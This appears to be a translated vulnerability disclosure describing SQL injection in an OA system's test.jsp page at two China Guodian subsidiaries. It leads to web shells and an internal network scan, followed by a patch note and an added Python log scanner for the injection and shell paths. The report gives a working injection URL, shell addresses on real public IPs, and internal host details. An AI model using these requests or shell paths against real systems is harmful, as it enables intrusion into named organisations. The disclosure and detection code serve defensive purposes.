SQL injection at two companies under China Guodian leads to getshell (internal network security affected)

https://60.13.13.239:8080/yyoa/
https://60.13.13.239:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database()
序号 @@basedir
1 D:\Program Files\UFseeyon\OA\mysql\bin\..\
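For the specific method of getting a shell, see
 WooYun: A disaster caused by an ignored vulnerability at Eastern Airlines Media (getshell possible)
Shell obtained: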
https://60.13.13.239:8080/yyoa/wel.jsp
https://60.13.13.239:8080/yyoa/cmd.jsp

ipconfig
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::50fc:d4c8:8aee:b822%11
   IPv4 地址 . . . . . . . . . . . . : 10.100.130.5
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.100.130.254
Uploaded a JSP proxy for scanning the internal network:
https://10.100.130.4 >> >>Apache-Coyote/1.1 >>Success
https://10.100.130.5 >> IIS7>>Microsoft-IIS/7.5 >>Success
https://10.100.130.11 >> >>Microsoft-IIS/6.0 >>Success
https://10.100.130.12 >> >>Microsoft-IIS/6.0 >>Success
https://10.100.130.6 >> >>Apache >>Success
https://10.100.130.101 >> >>Apache >>Success
https://10.100.130.253 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
https://10.100.130.252 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
Some internal documents and logs.


https://222.89.154.134:8080/yyoa/
Shell address: https://222.89.154.134:8080/yyoa/cmd.jsp

Solution:
Upgrade the program and apply patches.
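
To check whether an installation was already reached through the paths in this report, the following added example (not part of the original report or of the vendor's code) scans web access logs for requests to the test.jsp page carrying an S1 statement and for successful requests to the two JSP files named above. The common/combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths named in the report: the test page that runs the S1 parameter as SQL,
# and the two JSP files that were present after the compromise.
SQL_TEST_PAGE = "/yyoa/common/js/menu/test.jsp"
SHELL_PATHS = {"/yyoa/wel.jsp", "/yyoa/cmd.jsp"}

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify(line):
    """Return (client, finding, detail) for a suspicious line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()  # Windows host: paths are case-insensitive
    if path == SQL_TEST_PAGE:
        # parse_qs URL-decodes values, so %20 in the statement becomes a space.
        params = parse_qs(url.query, keep_blank_values=True)
        stmt = params.get("S1", [""])[0]
        return (client, "sql-test-page", stmt or "(no S1 statement)")
    if path in SHELL_PATHS and status == "200":
        return (client, "known-shell-path", path)
    return None


def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2015:10:00:01 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2015:10:00:09 +0800] "GET /yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database() HTTP/1.1" 200 311',
    '203.0.113.7 - - [01/Jan/2015:10:03:40 +0800] "GET /yyoa/cmd.jsp HTTP/1.1" 200 98',
    '198.51.100.4 - - [01/Jan/2015:10:05:00 +0800] "GET /yyoa/wel.jsp HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for client, finding, detail in scan(SAMPLE_LOG):
        print(f"{client}\t{finding}\t{detail}")
```

Any hit on the test page is worth investigating regardless of status code, since the page has no business being reachable in production; removing it is part of patching.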